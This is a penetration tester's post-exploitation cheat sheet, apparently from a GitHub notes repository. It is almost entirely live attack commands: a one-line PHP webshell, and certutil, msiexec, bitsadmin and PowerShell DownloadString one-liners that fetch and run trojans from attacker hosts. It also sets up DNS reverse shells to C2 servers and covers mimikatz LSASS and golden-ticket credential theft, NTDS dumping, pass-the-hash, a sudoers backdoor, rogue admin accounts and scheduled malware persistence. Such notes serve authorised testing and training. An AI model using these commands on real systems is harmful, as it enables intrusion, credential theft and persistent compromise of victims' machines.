POST exploitation (https://github.com/w4fz5uck5)

#https://raw.githubusercontent.com/w4fz5uck5/Pentest-notes/master/POST_exploitation.txt
CYTHON:
  sudo pip install cython
  mv test.py test.pyx
  cython test.pyx --embed

  <python 3>
  gcc -Os -I /usr/include/python3.5m -o test test.c -lpython3.5m -lpthread -lm -lutil -ldl

  <python 2>
  gcc -Os -I /usr/include/python2.7 -o test test.c -lpython2.7 -lpthread -lm -lutil -ldl

LIKE A BOSS PHP WEBSHELL:
  <?=($_=@$_GET[0]).@$_($_GET[1]);
  |
   -> 127.0.0.1?0=system&1=ls -la

DOWNLOAD/EXECUTE FILES WITHOUT POWERSHELL:
     # attacker machine: python -m SimpleHTTPServer 80
     certutil -urlcache -split -f  attacker.com/trojan.exe %TEMP%\trojan.exe && %TEMP%\trojan.exe

     # attacker machine: msfvenom -p windows/shell_reverse_tcp lhost=192.168.0.104 lport=31337 -f msi > trojan.msi
     # attacker machine: python -m SimpleHTTPServer 80
     msiexec /q /i http://attacker.com/trojan.msi

     # attacker machine: atftpd --daemon --port 69 /tmp
     tftp -i attacker.com GET trojan.exe %TEMP%\trojan.exe && %TEMP%\trojan.exe

     # attacker machine: python -m SimpleHTTPServer 80
     bitsadmin /transfer n http://attacker.com/trojan.exe %TEMP%\trojan.exe && %TEMP%\trojan.exe

     # attacker machine: twistd -n ftp -p 21
     ftp 127.0.0.1 username password get file exit

ANTIVIRUS:
   sc query Windefend    #Check for windows defender

SHOW HOTFIXES:
   wmic qfe get Caption,Description,HotFixID,Installedon

DNS reverse shell
   |-----------------Dnscat2 powershell METHOD-------------
   '-> https://github.com/iagox86/dnscat2
   |-> ruby dnscat2 dummyc2.net -e open --no-cache   # Start dnscat2 server on your c2dummy machine
   |  |
   |   '-> https://github.com/lukebaggett/dnscat2-powershell  # Connect to the server using powershell script
   |   '-> Start-Dnscat2 -Domain dummyc2.net -DNSServer <c2IP> -NoEncryption
   |
   |--------------------powercat METHOD--------------------
   '-> https://github.com/iagox86/dnscat2/archive/v0.01.zip
   '-> dnscat2 version 1 (works better):
   |
    -> ruby dnscat2 dummyc2.net   # Start dnscat2 server on your c2dummy machine
   |  |
   |  '-> https://github.com/besimorhino/powercat
   |  '-> powercat -c <c2ip> -dns  dummyc2.net -p 53 -rep -v -ep -dnsft 20  # Connecting to server using powercat script
   |
   |--------------------iagox86 METHOD--------------------
   '-> https://downloads.skullsecurity.org/dnscat2/
   '-> https://github.com/iagox86/dnscat2
   |
   '-> PS C:\Users\bob\Desktop>
   '-> $PEBytes = [Convert]::FromBase64String((new-object net.webclient).DownloadString("http://c2.net:8000/dnscat.txt"));
   |
   '-> IEX(new-object net.webclient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-ReflectivePEInjection.ps1");
   |
   '-> Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "--dns domain=c2.net,server=8.8.8.8"

PASS-THE-HASH:
  Metasploit:
    use exploit/windows/smb/psexec
  pth-smbclient --user=<USER> --pw-nt-hash -m smb3 -L <TARGET_IP> \\\\<TARGET_IP>\\ <SMB HASH>
  pth-winexe -U <DOMAIN>/<USER>%<PASSWORD> --system //<TARGET_IP> cmd.exe
  pth-winexe -U <DOMAIN>/<USER>%00000000000000000000000000000000:<PASSWORD> --system //<TARGET_IP> cmd.exe # NT is not necessary, only LM
  |
   -> https://github.com/byt3bl33d3r/pth-toolkit.git
DOCKER:
  docker run -v /:/host -t -i bash  #privilege escalation: https://fosterelli.co/privilege-escalation-via-docker.html

Nice and  reliable payloads:
  windows/meterpreter_reverse_https

CREDENTIALS:

    .--
    | From non-auth user to local admin in 3 steps (still to common) Nullsession:
    |   net use \\dc\ipc$ "" /u:""
    |
    | Search for cpasswords in gpo's:
    |   dir \\dc\sysvol\contoso.corp\Policies -r -I *.xml | Select-String cPassword >> dump.txt
    |
    | Decrypt the cPassword:
    |   gpp-decrypt <string>
    \_

    PWDUMP:
      reg save hklm\sam c:\sam
      reg save hklm\system c:\system
      pwdump system sam

   Mimikatz:
        LSASS.DUMP:
              C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
              mimikatz # sekurlsa::minidump lsass.dmp
              mimikatz # sekurlsa::logonPasswords
              <....>
        GOLDEN TICKET:
              http://rycon.hu/papers/goldenticket.html
              https://bluescreenofjeff.com/2017-05-23-how-to-pass-the-ticket-through-ssh-tunnels/
              https://resources.infosecinstitute.com/pass-hash-pass-ticket-no-pain/#gref

              cmds:
                    kerberos::golden /user:utilisateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /id:1107 /groups:513 /ticket:utilisateur.chocolate.kirbi

                    sekurlsa::tickets /export
                    kerberos::ptt <out-*krbtgt*.kirbi> # Located on mimikatz current work folder

        BYPASSING AV:
              https://github.com/klsecservices/bat-armor/blob/master/examples/krbtgt.bat

        MIMIKATZ PARSER: #https://gist.github.com/Raikia/66ba8279971d16770e94
          Mimikatz 1.0:
          cat mimikatz_dump.txt  | grep -P '((Utilisateur principal)|(msv1_0)|(kerberos)|(ssp)|(wdigest)|(tspkg))\s+:\s+.+' | grep -v 'n\.' | sed -e 's/^\s\+[^:]*:\s\+//' | sed -e 's/Utilisateur principal\s\+:\s\+\(.*\)$/\n\1/' | sort -u

          Mimikatz 2.0 (unfortunately, you must "apt-get install pcregrep" because reasons):

          cat mimikatz_dump.txt | pcregrep -M 'Username\s+:\s+[^\s]+\n.*Domain\s+:\s+[^\s]+\n.*Password\s+:\s+[^\s]+\n' | sed "s/'/\\\'/" | xargs -L 3 echo | grep -v '\(null\)' | sed -e 's/* Username : //g;s/* Domain ://g;s/* Password ://g' | awk '{print $2 "\\" $1 ":" $3}' | sort -u


Domain Controller:
  nltest /dclist:domain.corp #resolve domain DCs names
  crackmapexec -t 20 smb --ntds <IP> -d <domain> -u <username> -p <password>  #dump all ntds credentials using clean text password
  crackmapexec -t 20 smb --ntds <IP> -d <domain> -u <username> -H <NTLM> #dump all ntds credentials using hash
  crackmapexec -t 20 smb <IPS.TXT>(or ip/24) -d <domain> -u <username> -H <NTLM> #bruteforce hosts using leaked administrators credentials
  qwinsta # show logged users
  quser
  net groups /domain
  net groups "Domain Admins" /domain
  Exchange Trusted Subsystem // Exchange Windows Permissions:
      https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/

VNCINJECT:
  use exploit/windows/local/payload_inject
  |
   -> set payload windows/vncinject/reverse_tcp

TCPDump:
  The machine can communicate with you?
  |
   -> tcpdump -i <interface> src host <target_ip>
  You can communicate with the target machine?
  |
   -> tcpdump -i <interface> dst host <target_ip>
  |
   -> Try to ping to know if that target machine have some connection with your pc.

Windows:

  WMIC:
      wmic logicaldisk get caption,description,drivetype,providername,volumename  # show windows logical disks
      wmic diskdrive list brief /format:list                                      # show windows disks drivers

  Windows Nmap like:
    setspn –Q */*

  certutil.exe:
    certutil -urlcache -split -f <WEBSITE>/backdoor.vbs C:\Windows\System32\backdoor.vbs && cscript .\backdoor.vbs
    cmd.exe /C certutil.exe  -urlcache -split -f "https://pastebin.com/raw/2agkDJKs" %TEMP%\p.txt && certutil.exe -f -decode %TEMP%\p.txt %TEMP%\p.exe      #download procdump.exe

  bitsadmin:
    bitsadmin /transfer myDownloadJob /download /priority normal http://downloadsrv/10mb.zip c:\10mb.zip

  POWERSHELL:
    Execute commands of another user:
      shellpop --number 9 --reverse --host <IP> --port <PORT>

      put the output in a file called "attack.txt", then:
      $user = "dummy"
      $password = "dummy" | ConvertTo-SecureString -AsPlainText -Force
      $creds = new-object system.management.automation.pscredential($user,$password)
      Start-Process -FilePath powershell.exe -WorkingDirectory "C:\Windows\System32\WindowsPowershell\v1.0\" -Credential $creds -ArgumentList("-nop -ep bypass IEX(new-object System.Net.WebClient).DownloadString('http://10.0.2.15:5252/attack.txt')")

    Powershell -nop -ep bypass -c "$file = Get-Content %TEMP%\b64.txt; Select-Object -Last 666 $file; $file"
    powershell -nop -ep bypass -c "IEX(new-object system.net.WebClient).DownloadString('https://pastebin.com/raw/yUjG8y4Q'); Invoke-MS16-032"
    powershell  -nop -ep bypass -File .\scan.ps1 -StartIPv4Address 192.168.1.0  -EndIPv4Address 192.168.1.0/24 -Force

  CACLS Windows permissions:
    Common:
        icacls <PATH> /grant "<USER>":(OI)(CI)M

    Add Read-Only permission to a single file
    CACLS myfile.txt /E /G "Power Users":R

    Add Full Control permission to a second group of users
    CACLS myfile.txt /E /G "FinanceUsers":F

    Now revoke the Read permissions from the first group
    CACLS myfile.txt /E /R "Power Users"

    Now give the first group Full-control:
    CACLS myfile.txt /E /G "Power Users":F

    Give the Finance group Full Control of a folder and all sub folders
    CACLS c:\docs\work /E /T /C /G "FinanceUsers":F

    SCHTASKS:
      schtasks /query /fo LIST /v   #query all tasks
      schtasks /query /tn malware_task /V   #query single task
      schtasks /create /sc minute /mo 1 /tn "malware_task" /tr "C:\Users\w4fz5uck5\Desktop\work\malware.exe" #each 1 min, the malware is executed

DPKG LIST:
  dpkg-query -l

Ports checkup:
  netstat -plunt
  sockstat  -l    #freebsd

Ping port scanner:
  for i in $(seq 1 65535); do timeout 0.1 /bin/bash -c "echo &>/dev/tcp/<IP>/$i && echo '$i is open'" 2>/dev/null; done

Mysql commands:
  mysql -u root --password=toor -e "use users; show tables;"
  mysql -u root --password=toor -e "\!/bin/bash"

Privesc Linux:
  sudo -l
  find  / -perm -2 ! -type l -ls 2>/dev/null
  find  / -writable -user <USER> 2>/dev/null
  find  / -perm -4000 2>/dev/null
  find  / -name <FILE_NAME>
  cat /etc/crontab
  ls -lRa /var/www/html/
  procmon.sh
  rpm -aq
  dirtycow.c
  echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/updat

Privesc Windows:
  https://pentestlab.blog/tag/local-exploits/
  rottenpotato.exe
  ms16-032
  taihou32.exe  #CVE-2015-1701
  taihou64.exe
  Tater
  post/multi/recon/local_exploit_suggester
  net users w4fz5uck5 h4x00r /add && net localgroup administrators w4fz5uck5 /add

Web directories:
  /var/www/html       #linux
  C:\inetpub\wwwroot  #windows

Portfwd:
  proxytunnel -p 10.0.1.114:3128 -d 127.0.0.1:22 -a 4444                #Used to portfwd in squid proxies.
  socat TCP-LISTEN:<PORT>,reuseaddr,addr TCP:<REMOTE_IP>:<REMOTE_PORT>
  /etc/rinet.conf                                                       #Create a proxy for tunneling

  ssh:
    Own all ports:
      shuttle -r <REMOTE_IP> 0/0
    local_tunnel:
      ssh <USER>@127.0.0.1 -L 5500:localhost:5500                     # Send my local port to the host who connected in my pc.
    remote_tunnel:
      ssh <USER>@127.0.0.1 -R 127.0.0.1:5500:localhost:5500           # Send my local port to the host who i'm connecting.
    nmap_trough_ssh:
      ssh -D 1080 user@host
      nmap -sS 1.2.3.4 --proxy 127.0.0.1:1080
    PLINK (need ansicon to run without ANSI bugs):
        ansicon.exe plink.exe -ssh test@192.168.0.108       #https://github.com/adoxa/ansicon/releases/download/v1.84/ansi184-bin.zip

  Metapsloit-Meterpreter:
    portfwd add –l 3389 –p 3389 –r <TARGET_HOST>

Oracle DB:

  metasploit-framework:
    auxiliary/admin/oracle/sid_brute
    auxiliary/admin/oracle/tnscmd
    auxiliary/admin/oracle/oracle_login
    auxiliary/scanner/oracle/sid_brute
    auxiliary/scanner/oracle/sid_enum
    auxiliary/scanner/oracle/tnslsnr_version

  odat:
    Usefull commands:
      get,put,remove:
        python odat.py utlfile 10.10.10.82 -U SCOTT -P tiger -d XE  --sysdba --help

      put:
       python odat.py dbmsxslprocessor -s <ip> -U SCOTT -P tiger -d XE --sysdba --putFile 'C:\inetpub\wwwroot\' 'test.txt' 'test.txt'

      read:
       python odat.py ctxsys -s <ip> -U SCOTT -P tiger -d XE  --sysdba --getFile 'C:\inetpub\wwwroot\test.txt'

    /*Features
    Thanks to ODAT, you can:
        search valid SID on a remote Oracle Database listener via:
            a dictionary attack
            a brute force attack
            ALIAS of the listener
        search Oracle accounts using:
            a dictionary attack
            each Oracle user like the password (need an account before to use this attack)
        execute system commands on the database server using:
            dbmsscheduler
            java
            externaltables
            oradbg
        download files stored on the database server using:
            utlfile
            external tables
            CTXSYS
        upload files on the database server using:
            utlfile
            dbmsxslprocessor
            dbmsadvisor
        delete files using:
            utlfile
        send/reveive HTTP requests from the database server using:
            utlhttp
            HttpUriType
        scan ports of the local server or a remote server using:
            utlhttp
            HttpUriType
            utltcp
        exploit the CVE-2012-313 (http://cvedetails.com/cve/2012-3137)
            pickup the session key and salt for arbitrary users
            attack by dictionary on sessions*/
         #https://www.kitploit.com/2014/07/odat-oracle-database-attacking-tool.html


# SPEEDING UP proxying
# https://www.hackwhackandsmack.com/?p=1021

proxychains nmap -p 1-1000 -sT -Pn --open -n -T4 --min-parallelism 100 --min-rate 1 --oG proxychains_nmap_old --append-output <IP Address>

Bringing Xargs into the loop with a thread count of 50 dramatically improves the results and only took 9 seconds to complete. An example of this usage has been shown below:

seq 1 1000 | xargs -P 50 -I{} proxychains nmap -p {} -sT -Pn --open -n -T4 --min-parallelism 100 --min-rate 1 --oG proxychains_nmap --append-output <IP Address>

If you want to run multiple ports or port ranges against multiple hosts you could use the following alternative:

seq 1 254 | xargs -P 50 -I{} proxychains nmap -p 80,443,3389,445,22 -sT -Pn --open -n -T4 --min-parallelism 100 --min-rate 1 --oG proxychains_nmap --append-output 192.168.1.{}
    #TODO